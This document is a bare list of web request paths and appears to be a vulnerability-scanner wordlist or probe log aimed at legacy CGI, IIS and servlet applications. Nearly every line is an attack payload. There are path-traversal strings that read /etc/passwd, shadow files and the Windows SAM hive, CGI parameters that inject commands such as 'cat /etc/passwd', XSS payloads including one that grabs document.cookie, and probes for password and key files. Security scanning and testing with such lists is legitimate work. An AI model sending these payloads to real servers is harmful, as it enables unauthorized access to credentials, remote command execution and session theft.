/web/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini/
/web/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._/,/web/%a%s%p%d/
/web/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam/,/web/%NETHOOD%//
/web/%00/,/web/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._/,/web/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam/,/web/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini/,/web/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/,/web/................../config.sys/,/web/................/boot.ini/,/web/....../config.sys/,/web/....../autoexec.bat/,/web/.........../boot.ini/,/web/.............../boot.ini/,/web/../../../../../../../../../../etc/*/
/web/...................../config.sys/,/web/*.*/,/web/%00//,/web/..../boot.ini/,/web/........./boot.ini/,/web/.../boot.ini/,/web/../../../../../../Scandisk.log/
/web/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam/,/web/%5c//,/web/..................../boot.ini/,/web/..../Windows/Admin.pwl/,/web/........../boot.ini/,/web/.../.../...//,/web/../../../../../../../../../boot.ini/
/web/.................../boot.ini/,/web/....../etc/hosts/,/web/............./boot.ini/,/web/../../../..//,/web/../../../../../../../../../../etc/passwd/
/web/../../../../%20all/
/web/../../../../../../../../../../etc/passw*/
/web/../../../../../boot.ini/
/web/../../../../../winnt/repair/sam._/
/web/../../../../etc/passwd/
/web/../../../autoexec.bat/
/web/../../../../etc/hosts/
/web/../../../../winnt/repair/sam._/
/web/../../../../config.sys/
/web/../../../../../etc/passwd/
/web/../../../../boot.ini/
/web/../../../boot.ini/
/web/../../../scandisk.log/
/web/../../shadow/
/web/../../winnt/win.ini/
/web/../../passwd/
/web/../../windows/user.dat/
/web/../../etc/passwd/
/web/../../../etc/passwd/
/web/../../boot.ini/
/web/../webserver.ini/,/web/..\..\..\..\..\..\autoexec.bat/,/web/.bash_history/,/web/.FBCIndex/,/web/..\\..\\..\winnt\repair\sam._/,/web/..\..\..\..\..\autoexec.bat/,/web/.html/............*/config.sys/,/web/.jpilot//,/web/.passwd/,/web/.pinerc/,/web/.ssh/authorized_keys/,/web///etc/hosts/,/web/ISSamples/SQLQHit.asp/,/web/DomainFiles/*//../../../../../../../../../../etc/passwd/
/web/a.asp/.%u002e/.%u002e/.%u002e/.%u002e/winnt/win.ini/
/web/_vti_pvt/author.log/,/web/_vti_txt/,/web/_vti_pvt/svacl.cnf/,/web/_vti_pvt/service.grp/,/web/_vti_pvt/administrator.pwd/,/web/a.asp/..%%35%63../..%%35%63..\winnt\repair\sam._/
/web/a%5c.aspx/,/web/_vti_pvt/linkinfo.cnf/,/web/a.asp/..%u00255c../..%u00255c..\winnt\repair\sam._/
/web/a.asp/..%%35c../..%%35c..\winnt\repair\sam._/
/web/_vti_pvt/shtml.dll/,/web/_vti_pvt/services.cnf/,/web/_vti_pvt/service.cnf/,/web/_vti_pvt/,/web/a.asp/..%25%35%63../..%25%35%63..\winnt\repair\sam./,/web/a.asp/..%255c../..%255c..\winnt\repair\sam._/,/web/a.asp/..%%35%63../..%%35%63../winnt/win.ini/
/web/_vti_pvt/doctodep.btr/,/web/a.asp/..%25%35%63../..%25%35%63../winnt/win.ini/,/web/a.asp/..%%35c../..%%35c../winnt/win.ini/
/web/a.asp/..%u005c../..%u005c../winnt/win.ini/
/web/a.asp/..%u002f../..%u002f../winnt/win.ini/
/web/a.asp/..%u002f../..%u002f..\winnt\repair\sam._/
/web/a.asp/..%u005c../..%u005c..\winnt\repair\sam._/
/web/cgi-bin/cgforum.cgi/,/web/cgi-bin/changepw.cgi/,/web/cgi-bin/cgiwrap/~@USERS/,/web/cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00/,/web/cgi-bin/classifieds/index.cgi/,/web/cgi-bin/clickresponder.pl/,/web/cgi-bin/com5..........................................................................................................................................................................................................................box/,/web/cgi-bin/commerce.cgi?page=check/,/web/cgi-bin/count.cgi/,/web/cgi-bin/counterfiglet/nc//,/web/cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')/,/web/cgi-bin/cutecast/members//,/web/cgi-bin/cvsweb/cvsweb.cgi/,/web/cgi-bin/day5datanotifier.cgi/,/web/cgi-bin/db_manager.cgi/,/web/cgi-bin/dcshop/orders/orders.txt/,/web/cgi-bin/donothing/,/web/cgi-bin/dumpenv.pl/,/web/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00/,/web/cgi-bin/enter.cgi/,/web/cgi-bin/ex-logger.pl/,/web/cgi-bin/ezadmin.cgi/,/web/cgi-bin/ezshopper2/loadpage.cgi/,/web/cgi-bin/faxsurvey?cat%20/etc/passwd/,/web/cgi-bin/finger.cgi/,/web/cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test/,/web/cgi-bin/fpcount.exe/,/web/cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test/,/web/cgi-bin/gH.cgi/,/web/cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1/,/web/cgi-bin/getdoc.cgi/,/web/cgi-bin/gm-cplog.cgi/,/web/cgi-bin/handler/netsonar;cat/etc/passwd|?data=Download/,/web/cgi-bin/hitview.cgi/,/web/cgi-bin/hsx.cgi/,/web/cgi-bin/htimage.exe?0,0/,/web/cgi-bin/html2wml.cgi/,/web/cgi-bin/icat/,/web/cgi-bin/iisadmpwd/aexp.htr/,/web/cgi-bin/imagemap/,/web/cgi-bin/inc/sendmail.inc/,/web/cgi-bin/input.bat/,/web/cgi-bin/journal.cgi?folder=journal.cgi%00/,/web/cgi-bin/ion-p?page=../../../../../etc/passwd/,/web/cgi-bin/login.pl?course_id=\/,/web/cgi-bin/log//,/web/cgi-bin/logs/access_log/,/web/cgi-bin/lookwho.cgi/,/web/cgi-bin/lsindex2.bat/,/web/cgi-bin/mailto.cgi/,/web/cgi-bin/mailform.pl/,/web/cgi-bin/mkplog.exe/,/web/cgi-bin/meta.pl/,/web/cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd/,/web/cgi-bin/mt-static//,/web/cgi-bin/mt-static/mt.cfg/,/web/cgi-bin/musicqueue.cgi/,/web/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd/,/web/cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd/,/web/cgi-bin/nph-error.pl/,/web/cgi-bin/nph-test-cgi/,/web/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0/,/web/cgi-bin/perl?-v/,/web/cgi-bin/perl/,/web/cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd/,/web/cgi-bin/phf.cgi/,/web/cgi-bin/photo/protected/manage.cgi/,/web/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00/,/web/cgi-bin/post-query/,/web/cgi-bin/postcards.cgi/,/web/cgi-bin/query?mss=%2e%2e/config/,/web/cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd/,/web/cgi-bin/register.cgi/,/web/cgi-bin/ratlog.cgi/,/web/cgi-bin/robadmin.cgi/,/web/cgi-bin/retrieve_password.pl/,/web/cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini/,/web/cgi-bin/scoadminreg.cgi/,/web/cgi-bin/sam._/,/web/cgi-bin/search.pl/,/web/cgi-bin/search97.vts/,/web/cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd/,/web/cgi-bin/shop/auth_data/auth_user_file.txt/,/web/cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|/,/web/cgi-bin/smartsearch/smartsearch.cgi/,/web/cgi-bin/spin_client.cgi?aaaaaaaa/,/web/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd/
/web/cgi-bin/cgiwrap/~root/,/web/cgi-bin/cgitest.exe/,/web/cgi-bin/classified.cgi/,/web/cgi-bin/classifieds.cgi/,/web/cgi-bin/cmd1.exe?/c+dir/,/web/cgi-bin/com5.pl/,/web/cgi-bin/common/listrec.pl/,/web/cgi-bin/counterbanner/,/web/cgi-bin/counterfiglet-ord/,/web/cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`/,/web/cgi-bin/data/fetch.php?page=/,/web/cgi-bin/db4web_c/dbdirname//etc/passwd/,/web/cgi-bin/dcboard.cgi/,/web/cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00/,/web/cgi-bin/empower?DB=UkRteamHole/,/web/cgi-bin/download.cgi/,/web/cgi-bin/dmailweb.cgi/,/web/cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00/,/web/cgi-bin/everythingform.cgi/,/web/cgi-bin/ezman.cgi/,/web/cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1/,/web/cgi-bin/filemail/,/web/cgi-bin/flexform/,/web/cgi-bin/fortune/,/web/cgi-bin/fpadmin.htm/,/web/cgi-bin/formmail.cgi/,/web/cgi-bin/gbadmin.cgi?action=change_adminpass/,/web/cgi-bin/gbook/gbook.cgi/,/web/cgi-bin/gettransbitmap/,/web/cgi-bin/gm.cgi/,/web/cgi-bin/handler.cgi/,/web/cgi-bin/horde/test.php?mode=phpinfo/,/web/cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00/,/web/cgi-bin/htmlscript?../../../../../../../../../../etc/passwd/,/web/cgi-bin/htimage.exe/path/filename?0,0/,/web/cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=/,/web/cgi-bin/iisadmpwd/aexp2.htr/,/web/cgi-bin/ikonboard/help.cgi?/,/web/cgi-bin/index.js0x70/,/web/cgi-bin/info2www/,/web/cgi-bin/jj/,/web/cgi-bin/lasso.cgi/,/web/cgi-bin/login.pl/,/web/cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd/,/web/cgi-bin/logs//,/web/cgi-bin/lwgate/,/web/cgi-bin/lwgate.cgi/,/web/cgi-bin/mailnews.cgi/,/web/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00/,/web/cgi-bin/mkilog.exe/,/web/cgi-bin/majordomo.pl/,/web/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=/,/web/cgi-bin/mt//,/web/cgi-bin/mt/mt-check.cgi/,/web/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a/,/web/cgi-bin/netpad.cgi/,/web/cgi-bin/nimages.php/,/web/cgi-bin/nph-maillist.pl/,/web/cgi-bin/pagelog.cgi/,/web/cgi-bin/ntitar.pl/,/web/cgi-bin/perl.exe?-v/,/web/cgi-bin/passwd.txt/,/web/cgi-bin/phf/,/web/cgi-bin/pfdisplay.cgi/,/web/cgi-bin/photo/manage.cgi/,/web/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00/,/web/cgi-bin/post16.exe/,/web/cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0/,/web/cgi-bin/query/,/web/cgi-bin/printenv/,/web/cgi-bin/redirect/,/web/cgi-bin/replicator/webpage.cgi/,/web/cgi-bin/rightfax/fuwww.dll/?/,/web/cgi-bin/rpm_query/,/web/cgi-bin/search.cgi/,/web/cgi-bin/sbcgi/sitebuilder.cgi/,/web/cgi-bin/rwcgi60/showenv/,/web/cgi-bin/search/tidfinder.cgi?2956734/,/web/cgi-bin/sendpage.pl/,/web/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd/,/web/cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd/,/web/cgi-bin/shtml.dll/,/web/cgi-bin/simplestguest.cgi/,/web/cgi-bin/ssi/,/web/cgi-bin/stat.pl/,/web/cgi-bin/stats//,/web/cgi-bin/statsconfig.pl/,/web/cgi-bin/statview.pl/,/web/cgi-bin/sws/manager.pl/,/web/cgi-bin/tcsh/,/web/cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00/,/web/cgi-bin/testcgi.exe/,/web/cgi-bin/texis/junk/,/web/cgi-bin/title.cgi/,/web/cgi-bin/tst.bat\dir/,/web/cgi-bin/unlg1.1/,/web/cgi-bin/uptime/,/web/cgi-bin/upload_file.pl/,/web/cgi-bin/w3-msql/,/web/cgi-bin/webbbs.exe/,/web/cgi-bin/vote.cgi/
/web/cgi-bin/cgiwrap/%3Cfont%20color=red%3E/,/web/cgi-bin/class/mysql.class/,/web/cgi-bin/com5.java/,/web/cgi-bin/code.php3/,/web/cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd/,/web/cgi-bin/contents.htm/,/web/cgi-bin/counterfiglet/nc/f/,/web/cgi-bin/csNews.cgi/,/web/cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')/,/web/cgi-bin/day5datacopier.cgi/,/web/cgi-bin/dcadmin.cgi/,/web/cgi-bin/dcforumlib.pl/,/web/cgi-bin/dcshop/auth_data/auth_user_file.txt/,/web/cgi-bin/edit.pl/,/web/cgi-bin/dnewsweb.cgi/,/web/cgi-bin/empower?DB=whateverwhatever/,/web/cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00/,/web/cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E/,/web/cgi-bin/excite;IFS=\/,/web/cgi-bin/ezshopper3/loadpage.cgi/,/web/cgi-bin/files.pl/,/web/cgi-bin/finger.pl/,/web/cgi-bin/fpremadm.exe/,/web/cgi-bin/foxweb.exe/,/web/cgi-bin/formmail.pl/,/web/cgi-bin/gbook/gbook.cgi?_MAILTO=check;id/,/web/cgi-bin/gbpass.pl/,/web/cgi-bin/global.cgi/,/web/cgi-bin/guestbook.cgi/,/web/cgi-bin/guestbook.pl/,/web/cgi-bin/hello.bat?dir+c:\/,/web/cgi-bin/htgrep/,/web/cgi-bin/htsearch?-c/nonexistant/,/web/cgi-bin/html2chtml.cgi/,/web/cgi-bin/ibill.pm/,/web/cgi-bin/iisadmpwd/anot.htr/,/web/cgi-bin/imagefolio/admin/admin.cgi/,/web/cgi-bin/index.pl/,/web/cgi-bin/infosrch.cgi/,/web/cgi-bin/ksh/,/web/cgi-bin/listrec.pl/,/web/cgi-bin/login.cgi/,/web/cgi-bin/mail/,/web/cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00/,/web/cgi-bin/mailit.pl/,/web/cgi-bin/mailform.exe/,/web/cgi-bin/mgrqcgi/,/web/cgi-bin/mdma.bat/,/web/cgi-bin/multihtml.pl?multi=/etc/passwd%00html/,/web/cgi-bin/mt-static/mt-load.cgi/,/web/cgi-bin/myguestbook.cgi?action=view/,/web/cgi-bin/news/news.cgi/,/web/cgi-bin/nlog-smb.pl/,/web/cgi-bin/nph-exploitscanget.cgi/,/web/cgi-bin/orders/orders.txt/,/web/cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd/,/web/cgi-bin/perl.exe/,/web/cgi-bin/parse-file/,/web/cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20/,/web/cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'/,/web/cgi-bin/php/,/web/cgi-bin/php.cgi/,/web/cgi-bin/post32.exe/,/web/cgi-bin/ppdscgi.exe/,/web/cgi-bin/profile.cgi/,/web/cgi-bin/quikstore.cfg/,/web/cgi-bin/redirect.exe/,/web/cgi-bin/responder.cgi/,/web/cgi-bin/rmp_query/,/web/cgi-bin/rtm.log/,/web/cgi-bin/scripts/perl.exe/,/web/cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3/,/web/cgi-bin/rsh/,/web/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc/,/web/cgi-bin/session/adminlogin/,/web/cgi-bin/sh/,/web/cgi-bin/shopper.cgi/,/web/cgi-bin/smartsearch.cgi/,/web/cgi-bin/show.pl/,/web/cgi-bin/sscd_suncourier.pl/,/web/cgi-bin/stats.prf/,/web/cgi-bin/stats-bin-p/reports/index.html/,/web/cgi-bin/store.cgi?StartID=../etc/hosts%00.html/,/web/cgi-bin/statsconfig/,/web/cgi-bin/test-cgi.tcl/,/web/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1/,/web/cgi-bin/survey/,/web/cgi-bin/test.cgi/,/web/cgi-bin/tigvote.cgi/,/web/cgi-bin/textcounter.pl/,/web/cgi-bin/ultraboard.pl/,/web/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd/,/web/cgi-bin/utm/admin/,/web/cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E/,/web/cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd/,/web/cgi-bin/webbbs.cgi/,/web/cgi-bin/visitor.exe/,/web/cgi-bin/virgil.cgi/,/web/cgi-bin/viewlogs.pl/,/web/cgi-bin/webmap.cgi/,/web/cgi-bin/webif.cgi/
/web/scripts/emurl/RECMAN.dll/,/web/scripts/fpadmcgi.exe/,/web/scripts/iisadmin/tools/mkilog.exe/,/web/scripts/samples/ctguestb.idc/,/web/scripts/srchadm/webhits.exe/,/web/se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse/,/web/scripts/upload.asp/,/web/secret.nsf/,/web/security/web_access.html/,/web/servlet/IsItWorking/,/web/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa/,/web/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00/,/web/shop/member_html.cgi?file=;cat%20/etc/passwd|/,/web/simplebbs/users/users.php/,/web/shopping/database/metacart.mdb/,/web/siteseed//,/web/siteminder/smadmin.html/,/web/smtp.box/,/web/sw000.asp?|-|0|404_Object_Not_Found/,/web/stronghold-status/,/web/taff/,/web/user.dat/
/web/scripts/dnewsweb.exe/,/web/scripts/fpcount.exe/,/web/scripts/samples/,/web/scripts/tools/ctss.idc/,/web/search/SQLQHit.asp/,/web/search97cgi/s97_cgi/,/web/secure/.wwwacl/,/web/servlet/SchedulerTransfer/,/web/servlet/com.unify.servletexec.UploadServlet/,/web/servlet/webacc?User.html=noexist/,/web/setup.nsf/,/web/signon/,/web/shoponline/fpdb/shop.mdb/,/web/surf/scwebusers/,/web/stronghold-info/,/web/useraction.php3/
/web/scripts/iisadmin/ism.dll/,/web/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini/,/web/securelogin/1,2345,A,00.html/,/web/servlet/SessionServlet/,/web/servlet/com.newatlanta.servletexec.JSP10Servlet//,/web/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com/
